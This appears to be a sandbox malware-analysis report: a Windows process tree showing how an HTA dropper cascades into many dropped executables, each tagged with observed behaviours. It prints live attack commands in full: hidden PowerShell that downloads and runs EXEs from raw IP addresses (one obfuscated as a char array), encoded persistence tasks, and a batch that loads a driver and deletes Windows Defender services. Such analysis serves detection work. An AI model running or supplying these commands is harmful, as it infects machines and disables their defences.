C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\p6jdEd9yb.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Users\Admin\AppData\Local\Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE"C:\Users\Admin\AppData\Local\Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4792
-
-
-
C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe9⤵
- Downloads MZ/PE file
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2060 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet10⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4528 -
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3436 -
C:\Users\Admin\Abspawnhlp.exeC:\Users\Admin\Abspawnhlp.exe12⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe12⤵
- System Location Discovery: System Language Discovery
PID:3484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"10⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:396
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi" /quiet10⤵
- System Location Discovery: System Language Discovery
PID:976
-
-
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"10⤵
- Executes dropped EXE
PID:1648 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 8011⤵
- Program crash
PID:1444
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet10⤵
- System Location Discovery: System Language Discovery
PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:552
-
-
C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1580 -
C:\Users\Admin\CamMenuMaker.exe"C:\Users\Admin\CamMenuMaker.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4292 -
C:\Users\Admin\CamMenuMaker.exeC:\Users\Admin\CamMenuMaker.exe12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
PID:6844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe12⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:316
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2752
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:3236
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:3236
-
-
C:\ProgramData\Google\Chrome\chrome.exe"C:\ProgramData\Google\Chrome\chrome.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2776 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:1580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6168 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:6648
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:1084
-
-
-
C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1444 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:6188
-
-
-
C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5304 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6792 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\599F.tmp\59A0.tmp\59A1.bat C:\Users\Admin\AppData\Local\Temp\261.exe"8⤵PID:404
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6756 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5A99.tmp\5A9A.tmp\5A9B.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"10⤵
- Drops file in Program Files directory
PID:2304 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:3156
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:6076
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:5316
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:7000
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:5576
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5924
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2084
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:5988
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:5292
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:2840
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:5512
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:4760
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:3444
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:6160
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:6228
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:6460
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:6624
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:6652
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:5288
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:5564
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:6976
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:5804
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:6480
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:6568
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:3084
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:212
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:6184
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:5596
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:5720
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:6964
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:6320
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1944
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:7064
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:5712
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:3964
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:6660
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:2968
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:7072
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:5684
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:4664
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:4968
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:6508
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:6676
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:6760
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:6860
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:5320
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:5312
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:5984
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:6292
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:6696
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:6800
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:7076
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:5812
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:5220
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:2536
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:5256
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:5412
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:2932
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:5604
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:6136
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408370101\760bf5946f.exe"C:\Users\Admin\AppData\Local\Temp\10408370101\760bf5946f.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:2336
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408380101\04214d2864.exe"C:\Users\Admin\AppData\Local\Temp\10408380101\04214d2864.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6008
-
-
C:\Users\Admin\AppData\Local\Temp\10408390101\60578b2a60.exe"C:\Users\Admin\AppData\Local\Temp\10408390101\60578b2a60.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2480
-
-
C:\Users\Admin\AppData\Local\Temp\10408400101\NHq7LaU.exe"C:\Users\Admin\AppData\Local\Temp\10408400101\NHq7LaU.exe"6⤵
- Executes dropped EXE
PID:5840
-
-
C:\Users\Admin\AppData\Local\Temp\10408410101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10408410101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5972
-
-
C:\Users\Admin\AppData\Local\Temp\10408420101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10408420101\7IIl2eE.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6184 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵
- System Location Discovery: System Language Discovery
PID:6856
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408430101\p3hx1_003.exe"C:\Users\Admin\AppData\Local\Temp\10408430101\p3hx1_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7020 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:6444
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
PID:5584
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵PID:6644
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2224
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952 -
C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4656 -
C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2480 -
C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe4⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))5⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1244 -
C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exeC:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4912 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe4⤵PID:5016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3652
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:916 -
C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exeC:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3852 -
C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exeC:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- System Location Discovery: System Language Discovery
PID:6840
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1648 -ip 16481⤵PID:1528
-
C:\ProgramData\Avex Designs\Updater.exe"C:\ProgramData\Avex Designs\Updater.exe" /u1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4236 -
C:\Windows\TEMP\dat2C08.tmp\dat2C09.exeC:\Windows\TEMP\dat2C08.tmp\dat2C09.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:216 -
C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe"C:\Windows\system32\config\systemprofile\Abspawnhlp.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:6772 -
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Windows\system32\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2868 -
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exeC:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:6280 -
